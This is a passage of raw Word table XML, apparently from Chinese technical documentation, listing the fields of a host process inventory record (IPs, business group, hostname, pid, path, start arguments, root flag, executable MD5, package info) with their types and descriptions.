        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5414D43E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E1F32B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="57B6F26C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D6FFBCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C1BE966" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65D5C6B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55346FEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BAE6F6D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="207F07D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="445C2DC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F540182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74CA9B22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="34538CA5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DF556AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="180B1FE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD316A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26195160" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55D70FB9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04475556" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA16AFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E91F581" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="308412EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68E1B583" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36830F30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CEA7C41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AAD9EF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61B7F292" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25F2DA9D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35FD40B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FA7F243" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7905C901" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DFD354E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1AD7C7C3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70B97473" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15B5618E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6C4F23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5824E7A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60F9C308" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6317525D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10BFA16A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22A01B01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7338B161" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="507AC6D9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68BC0037" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F6136EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F848F4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B79F362" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程版本，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3ACE7598" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="112B6148" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="483FB097" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E667BDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CAA42B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否root权限启动，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63498B65" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D821F83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>prtCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23FFAF85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22FD4D5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A8DF6FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程端口数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7095B5D5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17759E13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163E0676" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="648AA240" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="357F52BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可执行文件md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36C7ED73" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6DADC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>packageName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CB09FCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EEF8CFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07006FA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程对应软件包名称，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3164BED6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EED2CD2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>packageVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BDD382C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C0DF8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="124D0FD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程对应软件包版本，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3603F8AD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00F9DF87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>installByPm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D00F1F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="784F8C36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC2E626" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否包管理器安装，Windows为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="455FDFED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5167D984" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18108089" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C1FCA9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AAC770B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42A2228C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A1E558D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ppid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48C4BC84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E80F9EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75010177" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32F198F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6114397D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FEE4813" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="534FEEAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C841A4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0D8DD86E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7986473E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startArgs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F681DF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48528417" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20A24DC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6779C915" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15B4BC58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51AA4147" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B971B4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EFF695C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程状态，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
